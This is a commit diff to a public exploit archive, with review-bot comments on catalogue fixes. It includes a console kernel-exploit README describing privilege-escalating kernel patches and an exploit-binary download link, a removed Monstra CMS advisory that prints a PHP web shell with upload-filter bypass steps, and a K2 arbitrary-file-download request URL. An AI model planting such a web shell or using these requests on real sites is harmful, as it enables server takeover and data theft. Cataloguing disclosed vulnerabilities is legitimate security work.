DB: 2018-03-02
9 changes to exploits/shellcodes
Nintendo Switch - WebKit Code Execution (PoC)
Nintendo Switch - WebKit Code Execution (PoC)
Monstra - Multiple HTML Injection Vulnerabilities
Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities
Monstra CMS - 'login' SQL Injection
Monstra CMS 1.2.0 - 'login' SQL Injection
Monstra CMS - Remote Code Execution
Joomla! Component K2 2.8.0 - Arbitrary File Download

parent 6885f2dcc7
commit b42c3d0ecd
6 changed files with 11 additions and 69 deletions
@ -10,11 +10,15 @@ The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Syscall instruction allowed anywhere
4) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.

## Notes
- Early stages, so no payloads yet, I may provide a debug menu payload later on in the day.
- Payloads from 4.05 should be fairly trivial to port unless they use hardcoded kernel offsets
- I've built in a patch so the kernel exploit will only run once on the system, you can make additional patches via payloads.
- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.


## Contributors
Massive credits to the following:
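Review bot: the kernel-patch list in this hunk numbers two consecutive items 4) ("Dynamic Resolving (`sys_dynlib_dlsym`) ..." and "Custom system call #11 (`kexec()`) ..."), so the `setuid(0)` item ends up as 5) where it should be 6); renumber the list so it runs 1) to 6). The same syscall #11 is also described in the Notes bullet below it, so the list entry could point at that bullet instead of explaining it twice.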
@ -23,4 +27,4 @@ Massive credits to the following:
- [Flatz](https://twitter.com/flat_z)
- Anonymous

Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196.zip
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44196-v2.zip
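Review bot: the Download line is swapped from 44196.zip to 44196-v2.zip, but no line in the README records what the reissued archive changes relative to the first one; a one-line entry under ## Notes saying what v2 adds or fixes would tell readers whether they need to fetch it again.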
@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/55171/info
<!--source: http://www.securityfocus.com/bid/55171/info

Monstra is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Monstra 1.2.1 is vulnerable; other versions may also be affected.
Monstra 1.2.1 is vulnerable; other versions may also be affected. -->

<html>
<head>
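Review bot: wrapping the SecurityFocus header in an HTML comment is the right fix for an .html PoC, since bare text before `<html>` would otherwise be rendered as page content; the comment opens on the "source:" line and closes on the "Monstra 1.2.1 is vulnerable" line, and none of the enclosed lines contain "--", so the comment terminates where intended. No further change needed.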
@ -1,37 +0,0 @@
## Vulnerabilities Summary
The following advisory describes a vulnerability found in Monstra CMS.

Monstra is “a modern and lightweight Content Management System. It is Easy to install, upgrade and use.”

The vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism.

## Credit
An independent security researcher, Ishaq Mohammed, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

## Vendor response
We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the github appears a bit more active (last commit from 2 years ago).

Without any vendor response the researcher was kind enough to create a patch that addresses this bug, its available here: https://github.com/monstra-cms/monstra/issues/426

CVE: CVE-2017-18048

## Vulnerabilities details
An editor can upload files to the Monstra CMS and can access them by clicking on them from the administrator portal. The default setup of Monstra CMS allows uploading of files only with certain extensions, forbidding all types of executable files which are mentioned in monstra\plugins\box\filesmanager\filesmanager.admin.php. However by simply uploading a php file with “PHP” (all characters in uppercase) extension will bypass this mechanism and will allow an attacker to execute shell commands on the server.

## Proof of Concept

Steps to Reproduce:

Login with a valid credentials of an Editor
Select Files option from the Dropdown menu of Content
Upload a file with PHP (uppercase)extenstion contaiing the below code:

```
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
```
Click on Upload

liOnce the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc.
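Review bot: this deletion removes the only lines in the change that record CVE-2017-18048 and the researcher's fix link (monstra-cms/monstra issue 426) for the Monstra CMS upload RCE; if 44045.md is being dropped as a duplicate of another entry, that entry should carry the CVE, and if it is being retracted, the commit message (which only lists titles) should say so, otherwise the CVE-to-entry mapping is lost silently.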
@ -1,23 +0,0 @@
# # # #
# Exploit Title: Joomla! Component K2 2.8.0 - Arbitrary File Download
# Dork: N/A
# Date: 26.02.2018
# Vendor Homepage: http://www.joomlaworks.net/
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-construction/k2/
# Software Download: https://getk2.org/downloads/?f=K2_v2.8.0.zip
# Version: 2.8.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7482
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# The vulnerability allows an users to arbitrary download files..
#
# 1)
# http://localhost/[PATH]/index.php?option=com_k2&view=media&task=connector&cmd=file&target=l1_[FILE_BASE64]&download=1&[TOKEN]=1
#
# # # #
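Review bot: the removed 44188.txt header is the only line in this change naming CVE-2018-7482 for the K2 2.8.0 arbitrary file download, and the matching csv row is dropped in the @ -38932 hunk; since the commit message only lists the title, the reason for pulling the entry (duplicate, retraction, re-numbered id) should be stated so the CVE reference does not disappear without a trail.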
@ -5881,6 +5881,7 @@ id,file,description,date,author,type,platform,port
44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,
44211,exploits/freebsd_x86-64/dos/44211.c,"FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44212,exploits/freebsd_x86-64/dos/44212.c,"FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)",2016-05-29,CTurt,dos,freebsd_x86-64,
44213,exploits/hardware/dos/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,qwertyoruiop,dos,hardware,
44215,exploits/multiple/dos/44215.m,"Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption",2018-02-28,"Zimperium zLabs Team",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
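Review bot: the added 44213 row points at exploits/hardware/dos/44213.html, whereas the row removed in the @ -9554 hunk had exploits/hardware/local/44213.html; only the csv change is visible in the hunks shown here, so confirm that the file itself was moved between those directories in this commit, otherwise files.csv will reference a path that does not exist.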
@ -9554,7 +9555,6 @@ id,file,description,date,author,type,platform,port
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
44213,exploits/hardware/local/44213.html,"Nintendo Switch - WebKit Code Execution (PoC)",2017-03-12,LiveOverflow,local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
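Review bot: besides the local-to-dos re-categorisation, this removal paired with the @ -5881 addition changes the author field for 44213 from LiveOverflow to qwertyoruiop while keeping the same description and 2017-03-12 date; if that is an attribution correction it deserves a mention in the commit message rather than being folded into the type change, because with an identical description string the author swap is easy to miss.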
@ -36029,7 +36029,7 @@ id,file,description,date,author,type,platform,port
37648,exploits/php/webapps/37648.txt,"Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities",2012-08-22,Crim3R,webapps,php,
37649,exploits/php/webapps/37649.html,"SiNG cms - 'Password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,webapps,php,
37650,exploits/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' SQL Injection",2012-08-22,kallimero,webapps,php,
37651,exploits/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,
37651,exploits/php/webapps/37651.html,"Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,
37652,exploits/php/webapps/37652.txt,"KindEditor - 'name' Cross-Site Scripting",2012-08-23,LiquidWorm,webapps,php,
37653,exploits/php/webapps/37653.txt,"WordPress Plugin Rich Widget - Arbitrary File Upload",2012-08-22,Crim3R,webapps,php,
37654,exploits/php/webapps/37654.txt,"WordPress Plugin Monsters Editor for WP Super Edit - Arbitrary File Upload",2012-08-22,Crim3R,webapps,php,
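Review bot: adding "CMS 1.2.1" to the 37651 title agrees with the "Monstra 1.2.1 is vulnerable; other versions may also be affected" line in the 37651.html hunk, so the csv description and the PoC file are now consistent; no further change needed.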
@ -36583,7 +36583,7 @@ id,file,description,date,author,type,platform,port
38765,exploits/php/webapps/38765.txt,"Horde Groupware 5.2.10 - Cross-Site Request Forgery",2015-11-19,"High-Tech Bridge SA",webapps,php,80
38767,exploits/php/webapps/38767.txt,"WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,webapps,php,
38768,exploits/php/webapps/38768.txt,"WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,webapps,php,
38769,exploits/php/webapps/38769.txt,"Monstra CMS - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,
38769,exploits/php/webapps/38769.txt,"Monstra CMS 1.2.0 - 'login' SQL Injection",2013-09-20,linc0ln.dll,webapps,php,
38770,exploits/php/webapps/38770.txt,"MentalJS - Sandbox Security Bypass",2013-09-20,"Rafay Baloch",webapps,php,
38773,exploits/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",webapps,hardware,
38781,exploits/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Multiple SQL Injections",2013-10-02,"Yu-Chi Ding",webapps,php,
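Review bot: the 38769 title now pins the 'login' SQL injection to Monstra CMS 1.2.0, but 38769.txt is not among the files touched in this change, so nothing in the diff corroborates that version; fine if it is taken from the exploit text itself, otherwise leave the version off rather than guess.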
@ -38118,7 +38118,6 @@ id,file,description,date,author,type,platform,port
44041,exploits/multiple/webapps/44041.txt,"Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution",2017-03-17,SecuriTeam,webapps,multiple,
44043,exploits/hardware/webapps/44043.md,"iBall WRA150N - Multiple Vulnerabilities",2018-01-29,SecuriTeam,webapps,hardware,
44044,exploits/php/webapps/44044.md,"GitStack - Unauthenticated Remote Code Execution",2018-01-15,SecuriTeam,webapps,php,
44045,exploits/php/webapps/44045.md,"Monstra CMS - Remote Code Execution",2017-12-06,SecuriTeam,webapps,php,
44050,exploits/php/webapps/44050.md,"Ametys CMS 4.0.2 - Unauthenticated Password Reset",2017-11-07,SecuriTeam,webapps,php,
44051,exploits/linux/webapps/44051.md,"DblTek - Multiple Vulnerabilities",2017-11-21,SecuriTeam,webapps,linux,
44054,exploits/linux/webapps/44054.md,"FiberHome - Directory Traversal",2017-10-13,SecuriTeam,webapps,linux,
@ -38932,7 +38931,6 @@ id,file,description,date,author,type,platform,port
44172,exploits/php/webapps/44172.txt,"Groupon Clone Script 3.0.2 - Cross-Site Scripting",2018-02-22,"Prasenjit Kanti Paul",webapps,php,
44185,exploits/php/webapps/44185.txt,"Schools Alert Management Script 2.0.2 - Authentication Bypass",2018-02-27,"Prasenjit Kanti Paul",webapps,php,
44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php,
44188,exploits/php/webapps/44188.txt,"Joomla! Component K2 2.8.0 - Arbitrary File Download",2018-02-27,"Ihsan Sencan",webapps,php,
44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php,
44192,exploits/php/webapps/44192.txt,"CMS Made Simple 2.1.6 - Remote Code Execution",2018-02-27,"Keerati T.",webapps,php,
44194,exploits/php/webapps/44194.py,"Concrete5 < 8.3.0 - Username / Comments Enumeration",2018-02-27,"Chapman Schleiss",webapps,php,